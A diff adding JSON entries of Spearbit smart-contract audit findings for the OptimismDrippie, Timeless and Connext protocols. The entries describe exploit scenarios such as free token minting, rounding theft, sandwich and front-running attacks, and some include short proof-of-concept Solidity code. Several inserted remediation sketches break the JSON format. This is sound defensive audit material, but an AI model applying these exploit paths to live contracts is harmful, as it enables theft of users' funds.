"Severity: Informational" + ] + }, + { + "title": "Licensing Conflict on Inherited Dependencies", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Solmate contracts are AGPL licensed, which is incompatible with the MIT license of the Drippie related contracts.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Rename Functions for Clarity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "status The status(string memory _name, DripStatus _status) function allows the owner to update the status of a drip. The purpose of the function, based on the name, is not obvious at first sight and could confuse a user into believing that it's a view function to retrieve the status of a drip instead of mutating its status. executable The executable(string memory _name) public view returns (bool) function returns true if the drip with name _name can be executed. A hypothetical renaming sketch follows this entry.",
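A hypothetical renaming sketch for the two functions discussed above (the names setStatus and canExecute, and the minimal contract around them, are suggestions of this writeup, not names from the codebase):

contract DrippieRenamed {
    enum DripStatus { NONE, ACTIVE, PAUSED, ARCHIVED }
    mapping(string => DripStatus) internal statuses;
    // Mutator: "setStatus" signals a state change, unlike the original "status".
    function setStatus(string memory _name, DripStatus _status) external {
        statuses[_name] = _status;
    }
    // Predicate: "canExecute" reads as a view, unlike the original "executable".
    function canExecute(string memory _name) public view returns (bool) {
        return statuses[_name] == DripStatus.ACTIVE;
    }
}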
+ "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Owner Has Permission to Drain Value from Drippie Contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Consider the following scenarios. Scenario 1 Owner may create arbitrary drips, including a drip to send all funds to themselves. Scenario 2 AssetReceiver permits the owner to withdraw ETH, ERC20 tokens, and ERC721 tokens. Scenario 3 Owner may execute arbitrary calls. The Transactor.CALL function allows the owner of the contract to execute a \"general purpose\" low-level call. function CALL( address _target, bytes memory _data, uint256 _gas, uint256 _value ) external payable onlyOwner returns (bool, bytes memory) { return _target.call{ gas: _gas, value: _value }(_data); } The function will transfer _value ETH present in the contract balance to the _target address. The function is also payable, which means that the owner can send some funds along with the call. Test example showcasing the issue: function test_transactorCALLAllowOwnerToDrainDrippieContract() public { bool success; vm.deal(deployer, 0 ether); vm.deal(bob, 0 ether); vm.deal(address(drippie), 1 ether); vm.prank(deployer); // send 1 ether via `call` (success, ) = drippie.CALL{value: 0 ether}(bob, \"\", 100000, 1 ether); assertEq(success, true); assertEq(address(drippie).balance, 0 ether); assertEq(bob.balance, 1 ether); }", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Mint PerpetualYieldTokens for free by self-transfer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The PYT.transfer and transferFrom functions operate on cached balance values. When transferring tokens to oneself, the decreased balance is overwritten by an increased balance, which makes it possible to mint PYT tokens for free. Consider the following exploit scenario: Attacker A self-transfers by calling token.transfer(A, token.balanceOf(A)). balanceOf[msg.sender] is first set to zero but then overwritten by balanceOf[to] = toBalance + amount, doubling A's balance.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Critical Risk" + ] + }, + { + "title": "xPYT auto-compound does not take pounder reward into account", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "Conceptually, the xPYT.pound function performs the following steps: 1. Claims yieldAmount yield for itself, deposits the yield back to receive more PYT/NYT (Gate.claimYieldEnter). 2. Buys xPYT with the NYT. 3. Performs an ERC4626.redeem(xPYT) with the bought amount, burning xPYT and receiving pytAmountRedeemed PYT. 4. Performs an ERC4626.deposit(pytAmountRedeemed + yieldAmount = pytCompounded). 5. Pays out a reward in PYT to the caller. The assetBalance is correctly updated for the first four steps but does not decrease by the pounder reward which is transferred out in the last step. The impact is that the contract has a smaller assets (PYT) balance than what is tracked in assetBalance. 1. Future depositors will have to make up for it, as sweep computes the difference between these two values. 2.
The xPYT exchange ratio is wrongly updated, and withdrawers can redeem xPYT for more assets than they should, until the last withdrawer is left holding valueless xPYT. Consider the following example and assume 100% fees for simplicity, i.e. pounderReward = pytCompounded. Vault total: 1k assets, 1k shares total supply. pound with 100% fee: claims Y PYT/NYT; swaps Y NYT to X xPYT; redeems X xPYT for X PYT by burning X xPYT (supply -= X, exchange ratio is 1-to-1 in the example); assetBalance is increased by the claimed Y PYT; the pounder receives a pounder reward of X + Y PYT, but assetBalance is not decreased by the pounder reward X + Y. Vault totals should be 1k-X assets, 1k-X shares, keeping the same share price. Nevertheless, vault totals actually are 1k+Y assets, 1k-X shares. Although the pounder receives 100% of the pounding rewards, the xPYT price (assets / shares) increased.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: High Risk" + ] + }, + { + "title": "Wrong yield accumulation in claimYieldAndEnter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The claimYieldAndEnter function does not accrue yield to the Gate contract itself (this) in case xPYT was specified. The idea is to accrue yield for the mint recipient first, before increasing/reducing their balance, so as not to interfere with the yield rewards computation. However, in case xPYT is used, tokens are minted to the Gate before its yield is accrued. Currently, the transfer from this to xPYT through the xPYT.deposit call accrues yield for this after the tokens have been minted to it (userPYTBalance * (updatedYieldPerToken - actualUserYieldPerToken) / PRECISION) and its balance increased. This leads to it receiving a larger yield amount than it should have.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: High Risk" + ] + }, + { + "title": "Swapper left-over token balances can be stolen", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The Swapper contract may never have any left-over token balances after performing a swap, because token balances can be stolen by anyone in several ways: by using Swapper.doZeroExSwap with useSwapperBalance and tokenOut = tokenToSteal; arbitrary token approvals to arbitrary spenders can be set on behalf of the Swapper contract using UniswapV3Swapper.swapUnderlyingToXpyt.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: High Risk" + ] + }, + { + "title": "TickMath might revert in solidity version 0.8", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "UniswapV3's TickMath library was changed to allow compilation with solidity version 0.8. However, adjustments to account for the implicit overflow behavior that the contract relies upon were not performed. UniswapV3xPYT.sol is compiled with version 0.8 and indirectly uses this library through the OracleLibrary. In the worst case, it could be that the library always reverts (instead of overflowing as in previous versions), leading to a broken xPYT contract. The same adjustment (pragma solidity >=0.5.0; instead of pragma solidity >=0.5.0 <0.8.0;) has been made for the OracleLibrary and PoolAddress contracts. However, their code does not rely on implicit overflow behavior.",
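A minimal sketch of the kind of adjustment the 0.8 migration needs (the helper shown is illustrative; the official Uniswap v3-core 0.8 branch wraps the affected math in unchecked blocks to keep the pre-0.8 wrap-around semantics):

pragma solidity >=0.8.0;

library TickMathPatched {
    // Under solidity >=0.8.0, arithmetic reverts on overflow, so multiplications
    // that previously relied on implicit mod 2**256 wrap-around must be wrapped.
    function mulShift(uint256 ratio, uint256 c) internal pure returns (uint256) {
        unchecked {
            return (ratio * c) >> 128; // may wrap, exactly as the 0.7-era code assumed
        }
    }
}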
+ "labels": [ + "Spearbit", + "Timeless", + "Severity: Medium Risk" + ] + }, + { + "title": "Rounding issues when exiting a vault through shares", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "When exiting a vault through Gate.exitToVaultShares the user specifies a vaultSharesAmount. The amount of PYT & NYT to burn is determined by a burnAmount = _vaultSharesAmountToUnderlyingAmount(vaultSharesAmount) call. All implementations of this function in the derived YearnGate and ERC4626 contracts round down the burnAmount. This means one needs to burn a smaller amount than the value of the received vault shares. This attack can be profitable and lead to all vault shares being stolen if the gas costs of the attack are low. This can be the case with vault & underlying tokens with a low number of decimals, highly valuable shares, or cheap gas costs. Consider the following scenario: Imagine the following vault assets: totalAssets = 1.9M, supply = 1M. Therefore, 1 share is theoretically worth 1.9 underlying. Call enterWithUnderlying(underlyingAmount = 1900) to mint 1900 PYT/NYT (and the gate receives 1900 * supply / totalAssets = 1000 vault shares). Call exitToVaultShares(vaultSharesAmount = 1), then burnAmount = shares.mulDivDown(totalAssets(), supply) = 1 * totalAssets / supply = 1. This burns 1 \"underlying\" (actually PYT/NYT but they are 1-to-1), but receives 1 vault share (worth 1.9 underlying). Repeat this for up to the minted 1900 PYT/NYT. The 1900 vault shares can then be redeemed for 3610 underlying directly at the vault, making a profit of 3610 - 1900 = 1710 underlying. A worked sketch of the rounding follows this entry.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Medium Risk" + ] + },
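A worked sketch of the rounding loss in the scenario above (standalone arithmetic under the example's numbers; mulDivDown is modeled by plain integer division):

function roundingLossExample() internal pure returns (uint256 burnAmount) {
    uint256 totalAssets = 1_900_000; // vault assets from the scenario
    uint256 supply = 1_000_000;      // vault share supply
    uint256 vaultSharesAmount = 1;
    // shares * totalAssets / supply rounds 1.9 down to 1, so burning
    // 1 PYT/NYT buys back a vault share worth 1.9 underlying
    burnAmount = (vaultSharesAmount * totalAssets) / supply; // == 1
}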
+ { + "title": "Possible outstanding allowances from Gate", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The vault parameter of Gate.enterWithUnderlying can be chosen by an attacker in such a way that underlying = vault.asset() is another vault token of the Gate itself. The subsequent _depositIntoVault(underlying, underlyingAmount, vault) call will approve underlyingAmount of underlying tokens to the provided vault and could in theory allow stealing from other vault shares. This is currently only exploitable in very rare cases, because the caller also has to transfer the underlyingAmount to the gate contract first. For example, this is the case when transferring underlyingAmount = type(uint256).max is possible due to flashloans/flashmints and the vault shares implement approvals in a way that no longer decreases the allowance if it is type(uint256).max, as is the case with ERC4626 vaults.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Low Risk" + ] + }, + { + "title": "Factory.sol owner can change fees unexpectedly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The Factory.sol owner may be able to front-run yield calculations in a gate implementation and change user fees unexpectedly.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Low Risk" + ] + }, + { + "title": "Low uniswapV3TwapSecondsAgo may result in AMM manipulation in pound()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The lower the value of uniswapV3TwapSecondsAgo set at construction time, the easier it becomes for an attacker to manipulate the results of the pound() function. Automated market maker price feeds with a lower time horizon are easier to manipulate, requiring less capital to manipulate prices, although users may simply not use an xPYT contract that sets uniswapV3TwapSecondsAgo too low.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Low Risk" + ] + }, + { + "title": "UniswapV3Swapper uses wrong allowance check", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "Before the UniswapV3Swapper can exit a gate, it needs to set an xPYT allowance to the gate. The following check determines if an approval needs to be set: if ( args.xPYT.allowance(address(this), address(args.gate)) < tokenAmountOut ) { args.xPYT.safeApprove(address(args.gate), type(uint256).max); } args.gate.exitToUnderlying( args.recipient, args.vault, args.xPYT, tokenAmountOut ); The tokenAmountOut is an underlying token amount but is compared against an xPYT shares amount. A legitimate gate.exitToUnderlying call will call xPYT.withdraw(tokenAmountOut, address(gate), address(swapper)), which checks allowance[swapper][gate] >= previewWithdraw(tokenAmountOut).", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Low Risk" + ] + }, + { + "title": "Missing check that tokenIn and tokenOut are different", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The doZeroExSwap() function takes in two ERC20 addresses, tokenIn and tokenOut. The problem is that the doZeroExSwap() function does not check that the two token addresses are different from one another. Adding this check can reduce possible attack vectors.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Low Risk" + ] + }, + { + "title": "Gate.sol gives unlimited ERC20 approval on pyt for arbitrary address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "A malicious contract may be passed into the claimYieldAndEnter() function as xPYT and given full control over any PYT the contract may ever hold. Even though PYT is validated to be a real PYT contract and the Gate.sol contract isn't expected to have any PYT in it, it would be safer to remove any unnecessary approvals.",
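A minimal sketch of scoping the approval instead of granting an unlimited one (the pyt/xPYT identifiers and the call placement are assumptions of this writeup, not the Gate's actual code):

// approve only what the xPYT deposit will pull for this call
pyt.approve(address(xPYT), amount);
xPYT.deposit(amount, recipient);
// clear any remainder so the external contract keeps no standing rights over the Gate's PYT
pyt.approve(address(xPYT), 0);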
+ "labels": [ + "Spearbit", + "Timeless", + "Severity: Low Risk" + ] + }, + { + "title": "Constructor function does not check for zero address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The constructor function does not check if the addresses passed in are zero addresses. This check can guard against errors during deployment of the contract.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Low Risk" + ] + }, + { + "title": "Accruing yield to msg.sender is not required when minting to xPYT contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The _exit function always accrues yield to the msg.sender before burning new tokens. The idea is to accrue yield for the recipient first, before increasing/reducing their balance, so as not to interfere with the yield rewards computation. However, in case xPYT is used, tokens are burned on the Gate and not msg.sender.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Low Risk" + ] + }, + { + "title": "Unlocked solidity pragmas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "Most of the implementation code uses a solidity pragma of 0.8.4. Unlocked solidity pragmas can result in unexpected behaviors or errors with different compiler versions.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Informational" + ] + }, + { + "title": "No safeCast in UniswapV3Swapper's _swap.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "It should be noted that solidity version 0.8.0 doesn't revert on overflow when type-casting. For example, if you tried casting the value 129 from uint8 to int8, it would overflow to -127 instead. This is because signed integers have a lower positive integer range compared to unsigned integers, i.e. -128 to 127 for int8 versus 0 to 255 for uint8.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Informational" + ] + }, + { + "title": "One step critical address change", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "Setting the owner in Ownable is a one-step transaction. This enables scenarios where contract functionality becomes inaccessible, or where a malicious address accidentally set as owner could compromise the system.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Informational" + ] + }, + { + "title": "Missing zero address checks in transfer and transferFrom functions.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The codebase uses solmate's ERC-20 implementation. It should be noted that this library sacrifices user safety for gas optimization.
As a result, their ERC-20 implementation doesn't include zero address checks on the transfer and transferFrom functions.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Informational" + ] + }, + { + "title": "Should add indexed keyword to deployed xPYT event", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The DeployXPYT event only has the ERC20 asset_ marked as indexed, while the deployed xPYT can also have the indexed keyword, since up to three can be used per event; this will make it easier for off-chain bots to interact with the protocol.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Informational" + ] + }, + { + "title": "Missing check that tokenAmountIn is larger than zero", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "In doZeroExSwap() there is no check that the tokenAmountIn number is larger than zero. Adding this check can add more thorough validation within the function.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Informational" + ] + }, + { + "title": "ERC20 does not emit Approval event in transferFrom", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The ERC20 contract does not emit new Approval events with the updated allowance in transferFrom. This makes it impossible to track approvals solely by looking at Approval events.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Informational" + ] + }, + { + "title": "Use the official UniswapV3 0.8 branch", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The current repositories create local copies of UniswapV3's codebase and manually migrate the contracts to Solidity 0.8. For FullMath.sol this also leads to some small gas optimizations in this LOC, as it uses 0 instead of type(uint256).max + 1.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Informational" + ] + }, + { + "title": "No checks that provided xPYT matches PYT of the provided vault", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The Gate contract has many functions that allow specifying vault and xPYT addresses as parameters. The underlying of the xPYT address is assumed to be the same as the vault's PYT, but this check is not enforced. Users that call the Gate functions with an xPYT contract for the wrong vault could see their deposits/withdrawals lost.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Informational" + ] + }, + { + "title": "Protocol does not work with non-standard ERC20 tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "Some ERC20 tokens make modifications to their ERC20 transfer or balanceOf functions. One kind includes deflationary tokens that charge a certain fee for every transfer or transferFrom. Others are rebasing tokens that increase in balance over time. Using these tokens in the protocol can lead to issues such as: Entering a vault through the Gate will not work, as it tries to deposit the pre-fee amount instead of the received post-fee amount. The UniswapV3Swapper tries to enter a vault with the pre-fee transfer amount.",
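A minimal sketch of measuring the post-fee amount instead of trusting the pre-fee amount (a generic pattern, not code from the audited contracts):

function pullExact(IERC20 token, address from, uint256 amount) internal returns (uint256 received) {
    uint256 balanceBefore = token.balanceOf(address(this));
    SafeERC20.safeTransferFrom(token, from, address(this), amount);
    // All downstream accounting should use `received`, not `amount`,
    // so fee-on-transfer tokens cannot desynchronize recorded balances.
    received = token.balanceOf(address(this)) - balanceBefore;
}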
+ "labels": [ + "Spearbit", + "Timeless", + "Severity: Informational" + ] + }, + { + "title": "Lack of transferId Verification Allows an Attacker to Front-Run Bridge Transfers", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The onReceive() function does not verify the integrity of transferId against all other parameters. Although the onlyBridgeRouter modifier checks that the call to the onReceive() function originates from another BridgeRouter (assuming a correct configuration of the whitelist), it does not check that the call originates from another Connext Diamond, therefore allowing anyone to send arbitrary data to BridgeRouter.sendToHook(), which is later interpreted as the transferId on Connext's NomadFacet.sol contract. This can be abused by a front-running attack as described in the following scenario: Alice is a bridge user and makes an honest call to transfer funds over to the destination chain. Bob does not make a transfer but instead calls the sendToHook() function with the same _extraData but passes an _amount of 1 wei. Both Alice and Bob have their tokens debited on the source chain and must wait for the Nomad protocol to optimistically verify incoming TransferToHook messages. Once the messages have been replicated onto the destination chain, Bob processes the message before Alice, causing onReceive() to be called on the same transferId. However, because _amount is not verified against the transferId, Alice receives significantly fewer tokens and the s.reconciledTransfers mapping marks the transfer as reconciled. Hence, Alice has effectively lost all her tokens during an attempt to bridge them. function onReceive( uint32, // _origin, not used uint32, // _tokenDomain, not used bytes32, // _tokenAddress, of canonical token, not used address _localToken, uint256 _amount, bytes memory _extraData ) external onlyBridgeRouter { bytes32 transferId = bytes32(_extraData); // Ensure the transaction has not already been handled (i.e. previously reconciled). if (s.reconciledTransfers[transferId]) { revert NomadFacet__reconcile_alreadyReconciled(); } // Mark the transfer as reconciled. s.reconciledTransfers[transferId] = true; Note: the same issue exists with _localToken. As a result, a malicious user could perform the same attack by using a malicious token contract and transferring the same amount of tokens in the call to sendToHook().", + "labels": [ + "Spearbit", + "Connext", + "Severity: Critical Risk" + ] + }, + { + "title": "swapOut allows overwrite of token balance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The StableSwapFacet has the function swapExactOut(), where a user could supply the same assetIn address as assetOut, which means the token indexes tokenIndexFrom and tokenIndexTo are the same. In function swapOut() a temporary array is used to store balances. When updating such balances, first self.balances[tokenIndexFrom] is updated and then self.balances[tokenIndexTo] is updated afterwards. However, when tokenIndexFrom == tokenIndexTo the second update overwrites the first update, causing token balances to be arbitrarily lowered. This also skews the exchange rates, allowing for swaps where value can be extracted. Note: the protection against this problem is located in function getY().
However, this function is not called from swapOut(). Note: the same issue exists in swapInternalOut(), which is called from swapFromLocalAssetIfNeededForExactOut() via _swapAssetOut(). However, via this route it is not possible to specify arbitrary token indexes; therefore, there isn't an immediate risk there. contract StableSwapFacet is BaseConnextFacet { ... function swapExactOut(... ,address assetIn, address assetOut, ... ) ... { return s.swapStorages[canonicalId].swapOut( getSwapTokenIndex(canonicalId, assetIn), getSwapTokenIndex(canonicalId, assetOut), amountOut, maxAmountIn // assetIn could be same as assetOut ); } ... } library SwapUtils { function swapOut(..., uint8 tokenIndexFrom, uint8 tokenIndexTo, ... ) ... { ... uint256[] memory balances = self.balances; ... self.balances[tokenIndexFrom] = balances[tokenIndexFrom].add(dx).sub(dxAdminFee); self.balances[tokenIndexTo] = balances[tokenIndexTo].sub(dy); // overwrites previous update if From == To ... } function getY(..., uint8 tokenIndexFrom, uint8 tokenIndexTo, ... ) ... { ... require(tokenIndexFrom != tokenIndexTo, \"compare token to itself\"); // here is the protection ... } } Below is a proof of concept which shows that the balance of index 3 can be arbitrarily reduced. //SPDX-License-Identifier: MIT pragma solidity 0.8.14; import \"hardhat/console.sol\"; contract test { uint[] balances = new uint[](10); function swap(uint8 tokenIndexFrom, uint8 tokenIndexTo, uint dx) public { uint dy = dx; // simplified uint256[] memory mbalances = balances; balances[tokenIndexFrom] = mbalances[tokenIndexFrom] + dx; balances[tokenIndexTo] = mbalances[tokenIndexTo] - dy; } constructor() { balances[3] = 100; swap(3, 3, 10); console.log(balances[3]); // 90 } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Critical Risk" + ] + }, + { + "title": "Use of spot price in SponsorVault leads to sandwich attack.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "There is a special sponsor role in the protocol. Sponsors can cover the liquidity fee and transfer fee for users, making it more favorable for users to migrate to the new chain. Sponsors can either provide liquidity for each adopted token or provide the native token in the SponsorVault. If the native token is provided, the SponsorVault will swap to the adopted token before transferring it to users. contract SponsorVault is ISponsorVault, ReentrancyGuard, Ownable { ... function reimburseLiquidityFees( address _token, uint256 _liquidityFee, address _receiver ) external override onlyConnext returns (uint256) { ... uint256 amountIn = tokenExchange.getInGivenExpectedOut(_token, _liquidityFee); amountIn = currentBalance >= amountIn ? amountIn : currentBalance; // sponsored fee may end up being less than _liquidityFee due to slippage sponsoredFee = tokenExchange.swapExactIn{value: amountIn}(_token, msg.sender); ... } } The spot AMM price is used when doing the swap. Attackers can manipulate the value of getInGivenExpectedOut and make SponsorVault sell the native token at a bad price. By executing a sandwich attack the exploiters can drain all native tokens in the sponsor vault. For the sake of the following example, assume that _token is USDC, the native token is ETH, and the sponsor tries to sponsor 100 USDC to the users: The attacker first manipulates the DEX and makes the exchange rate 1 ETH = 0.1 USDC. getInGivenExpectedOut returns 100 / 0.1 = 1000. tokenExchange.swapExactIn buys 100 USDC with 1000 ETH, causing the ETH price to decrease even lower. The attacker buys ETH back at a lower price and realizes a profit.",
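A minimal sketch of capping the swap with a trusted reference rate instead of the manipulable spot quote (maxNativePerToken and its 1e18 scaling are hypothetical; the point is that amountIn must be bounded independently of the AMM):

uint256 amountIn = tokenExchange.getInGivenExpectedOut(_token, _liquidityFee);
// hypothetical owner-configured ceiling, e.g. derived from a TWAP or an off-chain oracle
uint256 maxIn = (_liquidityFee * maxNativePerToken[_token]) / 1e18;
if (amountIn > maxIn) amountIn = maxIn; // refuse to overpay into a skewed pool
sponsoredFee = tokenExchange.swapExactIn{value: amountIn}(_token, msg.sender);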
+ "labels": [ + "Spearbit", + "Connext", + "Severity: Critical Risk" + ] + }, + { + "title": "Configuration is crucial (both Nomad and Connext)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The Connext and Nomad protocols rely heavily on configuration parameters. These parameters are configured at deployment time and are updated afterwards. Configuration errors can have major consequences. Examples of important configurations are: BridgeFacet.sol: s.promiseRouter. BridgeFacet.sol: s.connextions. BridgeFacet.sol: s.approvedSequencers. Router.sol: remotes[]. xAppConnectionManager.sol: home. xAppConnectionManager.sol: replicaToDomain[]. xAppConnectionManager.sol: domainToReplica[].", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Deriving price with balanceOf is dangerous", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "getPriceFromDex derives the price by querying the balances of AMM pools. function getPriceFromDex(address _tokenAddress) public view returns (uint256) { PriceInfo storage priceInfo = priceRecords[_tokenAddress]; ... uint256 rawTokenAmount = IERC20Extended(priceInfo.token).balanceOf(priceInfo.lpToken); ... uint256 rawBaseTokenAmount = IERC20Extended(priceInfo.baseToken).balanceOf(priceInfo.lpToken); ... } Deriving the price with balanceOf is dangerous, as balanceOf may be gamed. Consider univ2 as an example: exploiters can first send tokens into the pool and pump the price, then absorb the tokens that were previously donated by calling mint.", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Routers can sybil attack the sponsor vault to drain funds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "When funds are bridged from the source to the destination chain, messages must first go through optimistic verification before being executed on the destination BridgeFacet.sol contract. Upon transfer processing, the contract checks if the domain is sponsored. If such is the case, then the user is reimbursed both for liquidity fees paid when the transfer was initiated and for the fees paid to the relayer during message propagation. There currently isn't any mechanism to detect sybil attacks. Therefore, a router can perform several large-value transfers in an effort to drain the sponsor vault of its funds. Because liquidity fees are paid to the router by a user connected to the router, there isn't any value lost in this type of attack.", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Routers are exposed to extreme slippage if they attempt to repay debt before being reconciled", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "When routers are reconciled, the local asset may need to be exchanged for the adopted asset in order to repay the unbacked Aave loan. AssetLogic.swapFromLocalAssetIfNeededForExactOut() takes two key arguments: _amount, representing exactly how much of the adopted asset should be received, and _maxIn, which is used to limit slippage and limit how much of the local asset is used in the swap.
Upon failure to swap, the protocol will reset the values for unbacked Aave debt and distribute local tokens to the router. However, if this router partially paid off some of the unbacked Aave debt before being reconciled, _maxIn will diverge from _amount, allowing value to be extracted in the form of slippage. As a result, routers may receive less than the amount of liquidity they initially provided, leading to router insolvency.", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Malicious call data can DOS execute", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "An attacker can DOS the executor contract by giving infinite allowance to normal users. Since the executor increases allowance before triggering an external call, the tx will always revert if the allowance is already infinite. function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes memory) { ... if (!isNative && hasValue) { SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount); // reverts if allowance was set to `infinite` before } ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall(...) // can set allowance to `infinite` ... }", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "DOS attack on the Nomad Home.sol Contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Upon calling xcall(), a message is dispatched via Nomad. A hash of this message is inserted into the merkle tree and the new root will be added at the end of the queue. Whenever the updater of Home.sol commits to a new root, improperUpdate() will check that the new update is not fraudulent. In doing so, it must iterate through the queue of merkle roots to find the correct committed root. Because anyone can dispatch a message and insert a new root into the queue, it is possible to impact the availability of the protocol by preventing honest messages from being included in the updated root. function improperUpdate(..., bytes32 _newRoot, ... ) public notFailed returns (bool) { ... // if the _newRoot is not currently contained in the queue, // slash the Updater and set the contract to FAILED state if (!queue.contains(_newRoot)) { _fail(); ... } ... } function contains(Queue storage _q, bytes32 _item) internal view returns (bool) { for (uint256 i = _q.first; i <= _q.last; i++) { if (_q.queue[i] == _item) { return true; } } return false; }", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Upon failing to back unbacked debt _reconcileProcessPortal() will leave the converted asset in the contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "When routers front liquidity for the protocol's users, they are later reconciled once the bridge has optimistically verified transfers from the source chain. Upon being reconciled, _reconcileProcessPortal() attempts to first pay back Aave debt before distributing the rest back to the router. However, _reconcileProcessPortal() will not convert the adopted asset back to the local asset in the case where the call to the Aave pool fails. Instead, the function will set amountIn = 0 and continue to distribute the local asset to the router.
